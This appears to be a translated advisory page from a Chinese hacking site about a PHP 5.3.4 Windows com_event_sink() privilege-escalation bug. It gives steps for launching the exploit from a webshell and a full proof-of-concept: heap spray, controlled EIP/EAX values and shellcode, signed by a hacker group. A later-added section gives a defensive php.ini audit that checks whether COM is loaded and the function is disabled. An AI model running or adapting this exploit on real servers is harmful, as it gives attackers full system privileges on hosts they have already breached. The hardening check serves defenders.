PHP 5.3.4 (WIN) COM_SINK elevation of privilege vulnerability - vulnerability warning - MyHack58

ID MYHACK58:62201235450
Type myhack58
Reporter Anonymous (佚名)
Modified 2012-11-08T00:00:00


The latest PHP release is now 5.4.x, but China is still in the phase of replacing 5.2.x with 5.3.x. The following vulnerability exists in the PHP 5.3.x branch.

The test method is as follows: cmd /c x:\php\php.exe x:\test.php

Download the PHP distribution to the local machine, then use php.exe to run the PHP script. From a webshell, call it through PHP's exec function, or use WScript.Shell to invoke cmd.exe with /c x:\php\php.exe x:\xxxx\test.php. Two screenshots from testing follow:

[Screenshot: 1.png]

Successful exploitation of this vulnerability gives the attacker the highest privilege level on the system.

[Screenshot: 0.jpg]

The vulnerability analysis will be attached later. The PoC code follows:

<?php
// PHP 5.3.4 (Windows build) com_event_sink() privilege escalation vulnerability
//$eip = "\x44\x43\x42\x41";
$eip = "\x4b\xe8\x57\x78";
$eax = "\x80\x01\x8d\x04";
$deodrant = "";
// one spray unit: 0x80 repetitions of the eip/eax pair
$axespray = str_repeat($eip . $eax, 0x80); //048d0190
echo strlen($axespray);
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
echo "Silic Group Hacker Army - BlackBap.Org";
//19200 == 4B32 4b00
// fill memory with copies of the spray unit
for ($axeeffect = 0; $axeeffect < 0x4B32; $axeeffect++) {
    $deodrant .= $axespray;
}
$terminate = "T";
$u[] = $deodrant;
$r[] = $deodrant . $terminate;
$a[] = $deodrant . $terminate;
$s[] = $deodrant . $terminate;
//$vVar = new VARIANT(0x048d0038+$offset); this value is controllable and can be modified
$vVar = new VARIANT(0x048d0000 + 180);
// payload (shellcode): NOP sled followed by the machine code
$buffer = "\x90\x90\x90" . "\xB9\x38\xDD\x82\x7C\x33\xC0\xBB" . "\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
$var2 = new VARIANT(0x41414242);
com_event_sink($vVar, $var2, $buffer);
?>
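A defender-side configuration check, added here as an example and not part of the original advisory or its PoC: the PoC reaches the bug only through com_event_sink() and the VARIANT class, so on a host that must stay on 5.3.x the practical mitigation is to keep the COM extension unloaded or to list com_event_sink under disable_functions. The function names and the sample php.ini fragments below are my own assumptions.

```php
<?php
// Added hardening check (not part of the original PoC): audits a php.ini text
// for the two settings that decide whether com_event_sink() is callable.
function audit_com_sink_exposure($ini)
{
    $comLoaded = false;   // extension=php_com_dotnet.dll (or com_dotnet) present?
    $disabled  = array(); // functions listed under disable_functions
    foreach (preg_split('/\R/', $ini) as $line) {
        $line = trim($line);
        if ($line === '' || $line[0] === ';') {
            continue; // blank line or ini comment (a commented-out extension= line counts as off)
        }
        if (preg_match('/^extension\s*=\s*"?(?:php_)?com_dotnet(?:\.dll)?"?$/i', $line)) {
            $comLoaded = true;
        } elseif (preg_match('/^disable_functions\s*=\s*"?([^"]*)"?$/i', $line, $m)) {
            $disabled = array_map('strtolower', array_map('trim', explode(',', $m[1])));
        }
    }
    $sinkDisabled = in_array('com_event_sink', $disabled, true);
    return array(
        'com_dotnet_loaded'       => $comLoaded,
        'com_event_sink_disabled' => $sinkDisabled,
        // exposed: the PoC's call path is available to any script this interpreter runs
        'exposed'                 => $comLoaded && !$sinkDisabled,
    );
}

// Live check for the running interpreter. Windows builds that compile COM
// support in have no extension= line at all, so the ini audit alone is not enough.
function com_sink_reachable_now()
{
    return extension_loaded('com_dotnet')
        && function_exists('com_event_sink')
        && class_exists('VARIANT', false);
}

// Constructed sample php.ini fragment (not taken from the advisory).
$sample = "; php.ini fragment\nextension=php_com_dotnet.dll\ndisable_functions = exec,shell_exec,system\n";
$report = audit_com_sink_exposure($sample);
var_dump($report['exposed']); // bool(true): COM loaded and com_event_sink still callable

// Hardened fragment: COM stays commented out and the sink function is blocked.
$hardened = ";extension=php_com_dotnet.dll\ndisable_functions = exec,shell_exec,system,com_event_sink\n";
$fixed = audit_com_sink_exposure($hardened);
var_dump($fixed['exposed']); // bool(false)
var_dump(com_sink_reachable_now()); // true only on a Windows build with COM loaded
```

Run it with the same php.exe the advisory targets; the live check reports the interpreter's actual state regardless of which ini file it read.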